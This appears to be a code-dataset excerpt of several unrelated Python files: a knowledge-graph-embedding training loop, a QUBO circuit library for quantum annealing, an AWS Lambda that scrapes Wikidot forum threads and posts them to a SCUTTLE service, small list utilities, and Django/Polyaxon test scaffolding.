Read triples and map them into ids.
'''
triples = []
with open(file_path) as fin:
for line in fin:
h, r, t = line.strip().split('\t')
triples.append((entity2id[h], relation2id[r], entity2id[t]))
return triples
def set_logger(args):
'''
Write logs to checkpoint and console
'''
if args.do_train:
log_file = os.path.join(args.save_path or args.init_checkpoint, 'train.log')
else:
log_file = os.path.join(args.save_path or args.init_checkpoint, 'test.log')
logging.basicConfig(
format='%(asctime)s %(levelname)-8s %(message)s',
level=logging.INFO,
datefmt='%Y-%m-%d %H:%M:%S',
filename=log_file,
filemode='w'
)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s')
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
def log_metrics(mode, step, metrics):
'''
Print the evaluation logs
'''
for metric in metrics:
logging.info('%s %s at step %d: %f' % (mode, metric, step, metrics[metric]))
def make_additional_symmetric_fake_graph(train_trip, max_node_id):
new_train_lst = []
add_nodes_id = max_node_id
for trip in train_trip:
new_train_lst.append(trip)
new_train_lst.append((trip[2] + add_nodes_id, trip[1], trip[0] + add_nodes_id))
return new_train_lst
def reciprocal_fake_graph(input_trip, n_relation):
new_train_lst = []
reciprocal_lst = []
for trip in input_trip:
new_train_lst.append(trip)
new_train_lst.append((trip[2], trip[1] + n_relation, trip[0]))
reciprocal_lst.append((trip[2], trip[1] + n_relation, trip[0]))
return new_train_lst, reciprocal_lst
def add_star_node(max_node_id, nentity, max_rel_id):
new_train_lst = []
for node in range(max_node_id):
new_train_lst.append((node, max_rel_id, nentity))
new_train_lst.append((nentity, max_rel_id, node))
return new_train_lst
def main(args):
if (not args.do_train) and (not args.do_valid) and (not args.do_test):
raise ValueError('one of train/val/test mode must be choosed.')
if args.init_checkpoint:
override_config(args)
elif args.data_path is None:
raise ValueError('one of init_checkpoint/data_path must be choosed.')
if args.do_train and args.save_path is None:
raise ValueError('Where do you want to save your trained model?')
if args.save_path and not os.path.exists(args.save_path):
os.makedirs(args.save_path)
# Write logs to checkpoint and console
set_logger(args)
with open(os.path.join(args.data_path, 'entities.dict')) as fin:
entity2id = dict()
for line in fin:
eid, entity = line.strip().split('\t')
entity2id[entity] = int(eid)
with open(os.path.join(args.data_path, 'relations.dict')) as fin:
relation2id = dict()
for line in fin:
rid, relation = line.strip().split('\t')
relation2id[relation] = int(rid)
# Read regions for Countries S* datasets
if args.countries:
regions = list()
with open(os.path.join(args.data_path, 'regions.list')) as fin:
for line in fin:
region = line.strip()
regions.append(entity2id[region])
args.regions = regions
nentity = len(entity2id)
nrelation = len(relation2id) * 2
args.nentity = nentity
args.nrelation = nrelation
logging.info('Model: %s' % args.model)
logging.info('Data Path: %s' % args.data_path)
logging.info('Evaluating on Valid Dataset specific relation ID %d' %(args.study_valid_id))
logging.info('#entity: %d' % nentity)
logging.info('#relation: %d' % nrelation)
_train_triples = read_triple(os.path.join(args.data_path, 'train.txt'), entity2id, relation2id)
_valid_triples = read_triple(os.path.join(args.data_path, 'valid.txt'), entity2id, relation2id)
_test_triples = read_triple(os.path.join(args.data_path, 'test.txt'), entity2id, relation2id)
_all_true_triples = _train_triples + _valid_triples + _test_triples
logging.info('#real_train: %d' % len(_train_triples))
logging.info('#real_valid: %d' % len(_valid_triples))
logging.info('#real_test: %d' % len(_test_triples))
train_triples = reciprocal_fake_graph(_train_triples, len(relation2id))
valid_triples = reciprocal_fake_graph(_valid_triples, len(relation2id))
test_triples = reciprocal_fake_graph(_test_triples, len(relation2id))
logging.info('#train: %d' % len(train_triples[0]))
logging.info('#valid: %d' % len(valid_triples[0]))
logging.info('#test: %d' % len(test_triples[0]))
#All true triples
all_true_triples = train_triples[0] + valid_triples[0] + test_triples[0]
reciprocal_all_true_triples = train_triples[1] + valid_triples[1] + test_triples[1]
kge_model = DensEModel(
model_name=args.model,
nentity=nentity,
nrelation=nrelation,
hidden_dim=args.hidden_dim,
gamma=args.gamma,
entity_embedding_has_mod=args.entity_embedding_has_mod,
relation_embedding_has_mod=args.relation_embedding_has_mod
)
logging.info('Model Parameter Configuration:')
for name, param in kge_model.named_parameters():
logging.info('Parameter %s: %s, require_grad = %s' % (name, str(param.size()), str(param.requires_grad)))
if args.cuda:
kge_model = kge_model.cuda()
if args.do_train:
# Set training dataloader iterator
train_dataloader_head = DataLoader(
TrainDataset(train_triples[0], all_true_triples, nentity, nrelation, args.negative_sample_size, 'head-batch'),
batch_size=args.batch_size,
shuffle=True,
num_workers=max(1, args.cpu_num//2),
collate_fn=TrainDataset.collate_fn
)
train_dataloader_tail = DataLoader(
TrainDataset(train_triples[0], all_true_triples, nentity, nrelation, args.negative_sample_size, 'tail-batch'),
batch_size=args.batch_size,
shuffle=True,
num_workers=max(1, args.cpu_num//2),
collate_fn=TrainDataset.collate_fn
)
train_iterator = BidirectionalOneShotIterator(train_dataloader_head, train_dataloader_tail)
# Set training configuration
current_learning_rate = args.learning_rate
optimizer = torch.optim.Adam(
filter(lambda p: p.requires_grad, kge_model.parameters()),
lr=current_learning_rate
)
scheduler = ReduceLROnPlateau(
optimizer, "min", patience=1000, verbose=True, factor=0.5, cooldown=500, min_lr=0.0000002)
if args.warm_up_steps:
warm_up_steps = args.warm_up_steps
else:
warm_up_steps = args.max_steps // 2
if args.init_checkpoint:
# Restore model from checkpoint directory
logging.info('Loading checkpoint %s...' % args.init_checkpoint)
checkpoint = torch.load(os.path.join(args.init_checkpoint, 'checkpoint'))
init_step = checkpoint['step']
kge_model.load_state_dict(checkpoint['model_state_dict'])
if args.do_train:
current_learning_rate = checkpoint['current_learning_rate']
warm_up_steps = checkpoint['warm_up_steps']
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
else:
logging.info('Ramdomly Initializing %s Model...' % args.model)
init_step = 0
step = init_step
logging.info('Start Training...')
logging.info('init_step = %d' % init_step)
logging.info('batch_size = %d' % args.batch_size)
logging.info('negative_adversarial_sampling = %d' % args.negative_adversarial_sampling)
logging.info('hidden_dim = %d' % args.hidden_dim)
logging.info('gamma = %f' % args.gamma)
logging.info('negative_adversarial_sampling = %s' % str(args.negative_adversarial_sampling))
logging.info('entity_embedding_has_mod = %s' % args.entity_embedding_has_mod)
logging.info('relation_embedding_has_mod = %s' % str(args.relation_embedding_has_mod))
if args.negative_adversarial_sampling:
logging.info('adversarial_temperature = %f' % args.adversarial_temperature)
# Set valid dataloader as it would be evaluated during training
if args.do_train:
logging.info('learning_rate = %d' % current_learning_rate)
training_logs = []
max_mrr = 0.
#Training Loop
for step in range(init_step, args.max_steps):
log = kge_model.train_step(kge_model, optimizer, train_iterator, step, args)
scheduler.step(log['loss'])
training_logs.append(log)
if step >= warm_up_steps:
current_learning_rate = current_learning_rate / 10
logging.info('Change learning_rate to %f at step %d' % (current_learning_rate, step))
optimizer = torch.optim.Adam(
filter(lambda p: p.requires_grad, kge_model.parameters()),
lr=current_learning_rate
)
warm_up_steps = warm_up_steps * 3
if step % args.log_steps == 0:
metrics = {}
for metric in training_logs[0].keys():
metrics[metric] = sum([log[metric] for log in training_logs])/len(training_logs)
log_metrics('Training average', step, metrics)
training_logs = []
if args.do_valid and (step+1) % args.valid_steps == 0:
logging.info('Evaluating on Valid Dataset...')
metrics = kge_model.test_step(kge_model, _valid_triples, _all_true_triples, args)
log_metrics('Valid', step, metrics)
if metrics['MRR'] > max_mrr:
logging.info('Better Performance on Valid, save model')
max_mrr = metrics['MRR']
save_variable_list = {
'step': step,
'current_learning_rate': current_learning_rate,
'warm_up_steps': warm_up_steps
}
save_model(kge_model, optimizer, save_variable_list, args)
# save_variable_list = {
# 'step': step,
# 'current_learning_rate': current_learning_rate,
# 'warm_up_steps': warm_up_steps
# }
# save_model(kge_model, optimizer, save_variable_list, args)
if args.do_valid:
logging.info('Evaluating on Valid Dataset...')
metrics = kge_model.test_step(kge_model, _valid_triples, _all_true_triples, args)
log_metrics('Valid', step, metrics)
if args.do_test:
logging.info('Evaluating on Test Dataset...')
metrics = kge_model.test_step(kge_model, _test_triples, _all_true_triples, args)
log_metrics('Test', step, metrics)
if args.evaluate_train:
logging.info('Evaluating on Training Dataset...')
metrics = kge_model.test_step(kge_model, _train_triples, _all_true_triples, args)
log_metrics('Test', step, metrics)
if __name__ == '__main__':
main(parse_args())
| StarcoderdataPython |
8024558 | from itertools import combinations, product
from qaml.qubo import QUBO
# Create a "Number" that is fixed point, by default a standard integer.
# This number supports operations with other number objects and Python
# integers and floats.
class Number:
def __init__(self, circuit, bit_indices, exponent, signed, constant=0):
# Store the provided parameters.
self.circuit = circuit
self.bit_indices = bit_indices
self.exponent = exponent
self.signed = signed
self.constant = constant
self.bits = QUBO()
# Initialize the number coefficients itself.
bits = len(bit_indices)
for i in range(bits - int(signed)):
bit = self.bit_indices[i]
self.bits[bit] = 2**(i + exponent)
if signed:
bit = self.bit_indices[bits-1]
self.bits[bit] = -2**(bits-1 + exponent)
# Store which values are one-local.
self.one_locals = set(self.bit_indices)
# Print out information about this number.
def __str__(self):
string = "Number:\n"
string += f" bit_indices: {self.bit_indices}\n"
string += f" exponent: {self.exponent}\n"
string += f" signed: {self.signed}\n"
string += f" bits: {dict(self.bits)}\n"
string += f" constant: {self.constant}\n"
string += f" one_locals: {self.one_locals}\n"
max_len_line = max(map(len, string.split("\n")))
page_break = '-'*max_len_line+"\n"
return page_break + string + page_break
# Addition from the right is the same.
def __radd__(self, num): return self._add__(num)
# Support addition of another number.
def __add__(self, num):
# Verify correct usage.
assert(type(num) in {type(self), int, float})
# Initialize a new Number object to be returned.
new_num = Number(self.circuit, self.bit_indices,
self.exponent, self.signed, self.constant)
new_num.bits = self.bits.copy()
new_num.one_locals = self.one_locals.copy()
# Generate a new number that is a copy of this one with a
# different constant term added on.
if (type(num) in {int, float}):
new_num.constant += num
# Perform the addition between the qubits in the QUBO.
elif (type(num) == type(self)):
# Add together the coefficients of the two QUBO's for each number.
for coef in num.bits:
new_num.bits[coef] = new_num.bits.get(coef, 0) + num.bits[coef]
# Update the one-local terms track for the new number.
new_num.one_locals = new_num.one_locals.union(num.one_locals)
new_num.constant = self.constant + num.constant
# Return the new number.
return new_num
# Support subtraction of another number.
def __sub__(self, num): return self + num.__neg__()
# Support negation of a number.
def __neg__(self):
# Initialize a new Number object to be returned.
new_num = Number(self.circuit, self.bit_indices,
self.exponent, self.signed, -self.constant)
# Make the QUBO the negation of all values in this QUBO.
new_num.bits = QUBO({coef:-self.bits[coef] for coef in self.bits})
new_num.one_locals = self.one_locals.copy()
return new_num
# Raise this to a power.
def __pow__(self, exponent):
num = 1
for i in range(exponent): num = self * num
return num
# Support multiplication with another number.
def __mul__(self, num):
# Verify correct usage.
assert(type(num) in {type(self), int, float})
# Initialize a new Number object to be returned.
new_num = Number(self.circuit, self.bit_indices,
self.exponent, self.signed, self.constant)
new_num.bits = self.bits.copy()
new_num.one_locals = self.one_locals.copy()
# Generate a new number that is a copy of this one with a
# different constant term multiplied on, also multiply QUBO.
if (type(num) in {int, float}):
new_num.constant *= num
for coef in new_num.bits: new_num.bits[coef] *= num
# Perform the multiplication between the qubits in the QUBO.
elif (type(num) == type(self)):
# First compute all the 1-local terms that require no anicillary bits.
shared_terms = num.one_locals.intersection(self.one_locals)
all_terms = self.one_locals.union(num.one_locals)
for coef in all_terms:
value = 0
if coef in self.one_locals: value += self.bits[coef] * num.constant
if coef in num.one_locals: value += num.bits[coef] * self.constant
if coef in shared_terms: value += self.bits[coef] * num.bits[coef]
new_num.bits[coef] = value
# Generate ancillary bits to make all 2-locals into 1-locals.
unique_pairs = {(min(c1,c2), max(c1,c2)) for (c1,c2) in product(
self.one_locals, num.one_locals) if (c1 != c2)}
ancillary_bits = self.circuit.allocate(len(unique_pairs))
# Construct the and gates to make new one-local terms.
for (c1, c2), a in zip(unique_pairs,ancillary_bits):
self.circuit.add_and(c1, c2, a)
# Assign the value of the new ancillary bit as their multiplication.
if (c1 in self.bits) and (c2 in num.bits):
new_num.bits[a] = self.bits[c1] * num.bits[c2]
if (c2 in self.bits) and (c1 in num.bits):
if (a in new_num.bits): new_num.bits[a] *= 2
else: new_num.bits[a] = self.bits[c2] * num.bits[c1]
# Update the now one-local terms in the new number.
new_num.one_locals = shared_terms.union(ancillary_bits)
# Multiply the constants together.
new_num.constant = self.constant * num.constant
# Return the new number.
return new_num
# Multiplication from the right is the same.
def __rmul__(self, num): return self.__mul__(num)
# Generate the squared value energy function QUBO for this number.
def squared(self):
qubo = QUBO()
# Square all the one-local terms (including constant interactions).
for coef in self.one_locals:
qubo[coef] = self.bits[coef]**2 + self.bits[coef]*2*self.constant
# Add the interactions for the squared (now two-local) terms.
for (c1, c2) in combinations(sorted(self.one_locals), 2):
qubo[(c1,c2)] = 2 * self.bits[c1] * self.bits[c2]
# Add constant term to QUBO (for squared correctness).
qubo["c"] = self.constant**2
return qubo
# Holder for a Quantum Annealing circuit in QUBO form. Keeps track of
# the bits that have been utilized. Produces the squared error energy
# function for numeric operations.
class Circuit:
def __init__(self):
self.bits = []
self.numbers = []
self.equations = []
self.and_gates = []
# Generate a collection of bits to be used as ancillary bits.
def allocate(self, bits):
if len(self.bits) == 0: self.bits += list(range(bits))
else: self.bits += list(range(self.bits[-1]+1, self.bits[-1]+1+bits))
return self.bits[len(self.bits)-bits:]
# Generate a 'Number' object with memory allocated in this circuit.
def Number(self, bits, exponent=0, signed=False):
self.numbers.append( Number(self, self.allocate(bits), exponent, signed) )
return self.numbers[-1]
# Add a number that represents an equation to the set of equations.
def add(self, *args, **kwargs): return self.square(*args, **kwargs)
def square(self, number):
self.equations.append( number )
# Construct an "and" gate over two input terms "c1" and "c2" and
# an output term "a". Store that and gate for later evaluation.
def add_and(self, c1, c2, a):
self.and_gates.append(
QUBO({a:3, (c1,c2):1, (c1,a):-2, (c2,a):-2}) )
# Generate the squared value energy function QUBO for this number.
def assemble(self, and_strength, verbose=True):
from qaml.qubo import qubo_ising_rescale_factor
# Compute the qubo without the and-gate rescale.
q = QUBO()
for n in self.equations:
q += n.squared()
# Set the rescale to the max Ising weight.
and_strength *= qubo_ising_rescale_factor(q)
if (len(self.and_gates) > 0) and verbose:
print(f"\nUsing and strength {and_strength:.2f}.")
# Generate a qubo for the squared value function.
# This is where the computation of the AND gates happens.
q = QUBO()
# Add 0 times all numbers to ensure all coefficients are included.
for n in self.numbers:
q += 0 * n.bits
# Add all of the squared equations.
for n in self.equations:
q += n.squared()
# Add all of the and gates with the specified strength.
for gate in self.and_gates:
q += gate * and_strength
return q
# Get the names of the Number objects in the user function that
# called this circuit (but not this function directly).
def _num_names(self):
import inspect
names = []
user_locals = inspect.currentframe().f_back.f_back.f_locals
# Cycle all the Number objects in this circuit.
for i in range(len(self.numbers)):
num = self.numbers[i]
names.append( ([f"Num {i}"]+[name for name in user_locals
if user_locals[name] is num])[-1] )
return names
# Given a string of bits that represents a state of this circuit,
# decode that string into the corresponding numbers (resolving
# logical conflicts like broken and gates if appropriate).
def decode(self, bits):
# Check to see if length of the bit sequence is valid.
if (len(bits) != len(self.bits)):
raise(IndexError(f"The provided bits have length {len(bits)}, but this circuit has {len(self.bits)} bits."))
# Compute the decoded values.
values = []
# Cycle through the numbers and get their values (in order).
for i in range(len(self.numbers)):
num = self.numbers[i]
num_len = len(num.bit_indices)
# Compute the value of the number (encode it back into decimal).
value = sum(bits[idx] * 2**(j+num.exponent) for j, idx
in enumerate(num.bit_indices[:num_len-num.signed]))
if num.signed: value -= bits[num.bit_indices[-1]] * 2**(num_len-1+num.exponent)
value += num.constant
# Record the (name, value, and percentage of failed and gates).
values.append( value )
# Fix all of the failed and gates and track the number failed.
failed_and_gates = 0
for ag in self.and_gates:
# Get all involved terms in this AND gate.
inputs = set()
output = None
for coef in ag:
if coef[0] == "a": output = int(coef[1:])
else: inputs.update(map(int,coef[1:].split('b')))
inputs.remove(output)
# Convert the inputs into proper indices.
c1, c2 = [i-1 for i in inputs]
a = output - 1
# Check to see if the gate was violated.
if (int(bits[c1] and bits[c2]) != bits[a]):
failed_and_gates += 1
# Fix the gate if it was violated.
bits[a] = int(bits[c1] and bits[c2])
and_failures = (None if (len(self.and_gates) == 0) else
100 * failed_and_gates / len(self.and_gates))
# Return the (list of values, and the % of and-gates broken).
return values, and_failures
# Run this circuit as if executing on a quantum annealer. Most
# importantly, turn the binary representations back into
# interpretable results and resolve any logical inconsistencies.
# Also, attempt to name the numbers with the variable names from
# the scope of the caller of this function.
#
# See documentation for "qaml.run_qubo" for full list of available
# keyword arguments to this function.
#
# If you are using a custom System, then the keywork arguments for
# the "System.samples" function could also be passed in here.
#
def run(self, and_strength=1/2, min_only=True, display=True, **run_qubo_kwargs):
from qaml import run_qubo
from qaml.systems import System
qubo = self.assemble(and_strength=and_strength, verbose=display)
system = System(qubo, constant=qubo.get('c',0))
if display: print("\n"+str(qubo)+"\n")
results = run_qubo(qubo, min_only=False, display=False, **run_qubo_kwargs)
# Get the total number of samples that were drawn from the system.
total_samples = sum(r[-1] for r in results.info.values())
# Capture all the outputs for each number.
outputs = {}
info_names = []
for bits in results:
# Get the (energy, chain break fraction, occurrence)[1:] for the bit pattern.
bits_info = results.info[tuple(bits)][1:]
# Implicitly correct and gates, count failures, get numeric values.
values, and_fails = self.decode( bits )
if (type(and_fails) == type(None)): and_fails = tuple()
else:
and_fails = (and_fails,)
if ("and breaks" not in info_names): info_names += ["and breaks"]
if (len(bits_info) > 1) and ("chain breaks" not in info_names):
info_names += ["chain breaks"]
# Compute the energy of the (corrected) set of bits.
energy = system.energy(bits)
# Store the information about AND failure rates and info if available.
key = (energy,) + tuple(values)
outputs[key] = outputs.get(key, []) + [and_fails + bits_info[:-1]] * bits_info[-1]
# Reduce to only the minimum energy outputs if that was requested.
# Notice this is done *after* correcting the AND gates.
if min_only:
min_energy = min(outputs, key=lambda k: k[0])[0]
for k in list(outputs):
if (k[0] > min_energy): outputs.pop(k)
solutions = []
# Get the names of the Number objects (for tracking / displaying).
num_names = self._num_names()
# Print out all of the outputs.
printout = [num_names + info_names + ["Occurrence", "Energy"]]
for key in sorted(outputs):
energy, values = key[0], key[1:]
solutions.append(values)
# Convert info into percentages.
info = [sum(row[i] for row in outputs[key]) / len(outputs[key])
for i in range(len(info_names))]
info = [f"{val: 5.1f}%" for val in info]
printout += [ list(map(str, values)) + info +
[str(len(outputs[key]))] + [str(energy)] ]
# If "display", then convert the printout into a table.
if display:
print(f"System collected {total_samples} samples.\n")
spacer = "\t"
# First, shift all values so they have a leading space.
for row in printout[1:]:
for i in range(len(row)): row[i] = " " + row[i]
# Now find the largest width column.
col_widths = [max(len(row[i]) for row in printout)
for i in range(len(printout[0]))]
# Print the header.
for val,width in zip(printout.pop(0), col_widths):
print(f"{val:<{width}s}", end=spacer)
print()
# Print all of the rows.
for row in printout:
for val,width in zip(row, col_widths):
print(f"{val:>{width}s}", end=spacer)
print()
# Return the list of values that achieved desired energy performance.
return solutions
| StarcoderdataPython |
352047 | import requests
import random
import string
import json
import re
import config
import helpers
import boto3
import os
from bs4 import BeautifulSoup
#temp
# import logging
# logger = logging.getLogger()
# logger.setLevel(logging.INFO)
def lambda_handler(event, context):
for record in event['Records']:
callback_url = record['messageAttributes']['callback_url']['stringValue']
wd_thread_id = record['messageAttributes']['thread_id']['stringValue']
wikidot_site = record['messageAttributes']['wikidot_site']['stringValue']
data = {'t': wd_thread_id, 'moduleName': 'forum/ForumViewThreadModule'}
haystack = helpers.fetch(data, wikidot_site)
# Do some stuff with the base thread.
try:
soup = BeautifulSoup(haystack, 'html.parser')
except TypeError: # NoneType, it gone.
return False # Send this to SCUTTLE.
titleblock = soup.find("div", {"class": "forum-breadcrumbs"})
forum = int(re.search('(?:\/forum\/c-)(\d*)', str(titleblock)).group(1))
title = re.search('(?:» (?!<))(.*)', str(titleblock)).group(1)
descriptionblock = soup.find("div", {"class": "description-block well"})
# Get the subtitle, which is a surprising amount of effort.
if wikidot_site == 'scp-ru': # SCP-RU
subtitle = re.findall('(?:<\/div>)(?:\s*<div class="head">Кратко:<\/div>){0,1}([\s\S]*)(?:<\/div>)', str(descriptionblock), re.MULTILINE)
elif wikidot_site == 'lafundacionscp': # SCP-ES
subtitle = re.findall('(?:<\/div>)(?:\s*<div class="head">Resumen:<\/div>){0,1}([\s\S]*)(?:<\/div>)', str(descriptionblock), re.MULTILINE)
elif wikidot_site == 'fondationscp': # SCP-FR
subtitle = re.findall('(?:<\/div>)(?:\s*<div class="head">Résumé:<\/div>){0,1}([\s\S]*)(?:<\/div>)', str(descriptionblock), re.MULTILINE)
elif wikidot_site == 'scp-wiki-de': # SCP-DE
subtitle = re.findall('(?:<\/div>)(?:\s*<div class="head">Beschreibung:<\/div>){0,1}([\s\S]*)(?:<\/div>)', str(descriptionblock), re.MULTILINE)
else: #SCP-EN and English-speaking wikis.
subtitle = re.findall('(?:<\/div>)(?:\s*<div class="head">Summary:<\/div>){0,1}([\s\S]*)(?:<\/div>)', str(descriptionblock), re.MULTILINE)
subtitle = ''.join(subtitle)
subtitle = subtitle.replace('\n','').replace('\t','') # These are artifacts of scraping HTML and not valid in subtitles.
if len(subtitle) is 0:
subtitle = None
# Get the creation timestamp for convenience in sorting later.
created_timestamp = int(re.search('(?:odate time_)(\d*)', str(descriptionblock)).group(1))
# Get the OP of the thread. This is Wikidot for a per-page discussion thread or a user id otherwise.
attribution = descriptionblock.find("span", {"class": "printuser"})
# logger.info(attribution)
if attribution.string == "Wikidot":
op_user_id = 0
op_username = "Wikidot"
else:
try:
op_user_id = int(re.search('(?:userInfo\()(\d*)', str(attribution)).group(1))
op_username = attribution.text
except AttributeError:
try:
# Deleted Accounts
op_user_id = int(re.search('(?:data-id=\")(\d*)', str(attribution)).group(1))
op_username = "Deleted Account (" + str(op_user_id) + ")"
except AttributeError:
try:
# Anonymous Accounts
op_user_id = 0
op_username = "Anonymous User (" + str(re.search('(?:anonymousUserInfo\(\')([\d\.]*)(?:\'\); return false;\"><)', str(attribution)).group(1))
except AttributeError:
# Guest Accounts
op_user_id = 0
op_username = str(re.search('(?:</a>)([^<]*)', str(attribution)).group(1))
# What we should have back is HTML laying out a page of forum comments.
# logger.info('haystack returned:')
# logger.info(haystack)
# First, let's determine if there are multiple pages.
try:
maxpages = re.search('(?:<span class="pager-no">page \d* of )(\d*)', haystack).group(1)
maxpages = int(maxpages)
except AttributeError: # NoneType means the pager is absent, meaning there's only one page of comments. This is okay.
maxpages = 1
# else: # wtf?
# logger.info('maxpages returned:')
# logger.info(maxpages)
# raise Exception('we hit a weird thing with the maxpages, aborting')
# logger.info('maxpages returned:')
# logger.info(maxpages)
# Let's handle things the same way for one page or many.
for page in range(maxpages):
actualpage = page + 1
# logger.info('On Page ' + str(actualpage))
innerpayload = {}
haystack = get_thread_page(thread=wd_thread_id, page=actualpage, wikidot_site=wikidot_site) # I'm too lazy to not just increment this range by one to make it work.
soup = BeautifulSoup(haystack.replace("\\","")[2:], 'html.parser')
posts = soup.find_all("div", id=re.compile("(fpc-)"))
# logger.info('posts:')
# logger.info(len(posts))
for idx, post in enumerate(posts):
wd_post_id = int(re.search('(?:<div class="post" id="post-)(\d*)', str(post)).group(1))
# logger.info("Post " + str(idx) + ", ID " + str(wd_post_id))
subject = re.search('(?:<div class="title" id="post-title-\d*">\s*)([^\n]*)', str(post)).group(1)
# On a blank subject this returns as "</div>"
if subject == "</div>":
subject = None
try:
username = re.search('(?:return false;">)([^<]*)(?:<\/a><\/span>,)', str(post)).group(1)
wd_user_id = int(re.search('(?:www\.wikidot\.com\/userkarma.php\?u=)([^\)]*)', str(post)).group(1))
except AttributeError: #NoneType, deleted user.
# logger.info('thread:')
# logger.info(wd_thread_id)
# logger.info('post:')
# logger.info(wd_post_id)
try:
wd_user_id = int(re.search('(?:data-id=")(\d*)', str(post)).group(1))
username = "Deleted Account " + str(wd_user_id)
except AttributeError: #NoneType, anonymous user!
try:
wd_user_id = 0
username = "Anonymous User (" + str(re.search('(?:anonymousUserInfo\(\\\')([\d\.]*)', str(post)).group(1)) + ")"
except AttributeError: # One last NoneType, GUEST user holy crap.
# logger.info(str(post))
try:
username = re.search('(?:alt=""/></a>)([^>]*)(?:</span>,)', str(post)).group(1)
wd_user_id = 0
except AttributeError: # This is getting ridiculous. More guest account types.
try:
# logger.info(str(post))
username = re.search('(?:&default=http:\/\/www.wikidot.com/common--images/avatars/default/a16.png&size=16"\/><\/a>)([^>]*)(?:<\/span>,)', str(post)).group(1)
wd_user_id = 0
except AttributeError:
# Guest with a URL in their name
wd_user_id = 0
tempusername = re.search('(?:rel=\"nofollow\">)([^<]*)(?:<\/a> \(guest\))', str(post)).group(1)
username = tempusername + " (guest"
post_created_at = int(re.search('(?:<span class="odate time_)([^\s]*)', str(post)).group(1))
content = post.find("div", {"class": "content"})
body = ''.join(str(item) for item in content.contents)
body = body[1:-1] # Wikidot pads the text with a \n on both sides, which the author didn't write.
try:
if post.parent['id'] == 'thread-container-posts':
# Top-level response
parent = 0
else:
# 'id' will look like fpc-12345678, take a slice of the string
# logger.info('parent:' + post.parent['id'])
parent = int(post.parent['id'][4:])
except KeyError: # We're at the root.
parent = 0
changespresent = post.find("div", {"class": "revisions"})
if changespresent is not None:
# This post was edited, send along a list of revisions and let those get picked up in a different routine.
# We're guaranteed at least two entries in here.
changes = re.findall('(?:showRevision\(event, )(\d*)', str(changespresent))
else:
changes = False
innerpayload[idx]={"wd_post_id": wd_post_id, "wd_user_id": wd_user_id,
"parent_id": parent, "subject": subject, "username": username, "timestamp": post_created_at,
"changes": changes, "text": body}
# logger.info('wd_post_id is a: ')
# logger.info(type(wd_post_id))
# logger.info('wd_user_id is a ')
# logger.info(type(wd_user_id))
# logger.info('parent_id is a ')
# logger.info(type(parent))
# logger.info('subject is a ')
# logger.info(type(subject))
# logger.info('username is a ')
# logger.info(type(username))
# logger.info('timestamp is a ')
# logger.info(type(post_created_at))
# logger.info('changes is a ')
# logger.info(type(changes))
# logger.info('text is a ')
# logger.info(type(body))
# While we could wait and send one big payload, that's a risky proposition on threads with lots of posts so let's not.
# logger.info('out of the loop for a single page')
# Wrap the payload and send it, SCUTTLE can sort out posts it already has.
outerpayload = {"wd_thread_id": int(wd_thread_id), "wd_forum_id": forum,
"wd_user_id": op_user_id, "wd_username": op_username, "title": title,
"subtitle": subtitle, "created_at": created_timestamp, "posts": innerpayload}
# logger.info('wd_thread_id is a: ')
# logger.info(type(wd_thread_id))
# logger.info('wd_forum_id is a ')
# logger.info(type(forum))
# logger.info('wd_user_id is a ')
# logger.info(type(wd_user_id))
# logger.info('wd_username is a ')
# logger.info(type(op_username))
# logger.info('title is a ')
# logger.info(type(title))
# logger.info('subtitle is a ')
# logger.info(type(subtitle))
# logger.info('created_at is a ')
# logger.info(type(created_timestamp))
# logger.info('posts is a ')
# logger.info(type(innerpayload))
# Send everything to SCUTTLE
output = json.dumps(outerpayload)
headers = {"Authorization": "Bearer " + config.scuttle_token, "Content-Type": "application/json"}
r = requests.put(callback_url + '/2stacks/thread/posts', data=output, headers=headers)
# logger.info('Made a SCUTTLE Request!')
# logger.info('DATA: ')
# logger.info(outerpayload)
return {"job": "complete"}
def get_thread_page(thread: int, page: int, wikidot_site: str):
data = {'t': thread, 'moduleName': 'forum/ForumViewThreadPostsModule', 'pageNo': page}
return helpers.fetch(data, wikidot_site) | StarcoderdataPython |
179192 | <reponame>KamilLoska/HeroAttack
def remove_if_exists(mylist, item):
""" Remove item from mylist if it exists, do nothing otherwise """
to_remove = []
for i in range(len(mylist)):
if mylist[i] == item:
to_remove.append(mylist[i])
for el in to_remove:
mylist.remove(el)
def remove_if_exists_copy(mylist, item):
""" Return new list with item removed """
new_list = []
for el in mylist:
if el != item:
new_list.append(el)
return new_list
def find_first(mylist, item):
""" Returns index of the first occurence of item in mylist, returns -1 if not found """
try:
idx = mylist.index(item)
except ValueError:
idx = -1
return idx
| StarcoderdataPython |
9713986 | #!/usr/bin/python
#
# Copyright 2018-2021 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.core.cache import cache
from django.test import TestCase
class PolyaxonBaseTest(TestCase):
COLLECT_TASKS = False
def setUp(self):
# Flush cache
cache.clear()
# Mock celery default sent task
self.mock_send_task()
super().setUp()
self.worker_send = {}
def mock_send_task(self):
from celery import current_app
def send_task(name, args=(), kwargs=None, **opts):
kwargs = kwargs or {}
if name in current_app.tasks:
task = current_app.tasks[name]
return task.apply_async(args, kwargs, **opts)
elif self.worker_send:
self.worker_send[name] = {"args": args, "kwargs": kwargs, "opts": opts}
current_app.send_task = send_task
class PolyaxonBaseTestSerializer(PolyaxonBaseTest):
query = None
serializer_class = None
model_class = None
factory_class = None
expected_keys = {}
num_objects = 2
def test_serialize_one(self):
raise NotImplementedError
def create_one(self):
raise NotImplementedError
def create_multiple(self):
for i in range(self.num_objects):
self.create_one()
def test_serialize_many(self):
self.create_multiple()
data = self.serializer_class(self.query.all(), many=True).data
assert len(data) == self.num_objects
for d in data:
assert set(d.keys()) == self.expected_keys
| StarcoderdataPython |
200090 | <filename>dealsengine/apps.py
from django.apps import AppConfig
class DealsengineConfig(AppConfig):
name = 'dealsengine'
| StarcoderdataPython |
4931394 | <filename>detect_secrets/core/common.py
from .baseline import format_baseline_for_output
def write_baseline_to_file(filename, data):
"""
:type filename: str
:type data: dict
:rtype: None
"""
with open(filename, 'w') as f: # pragma: no cover
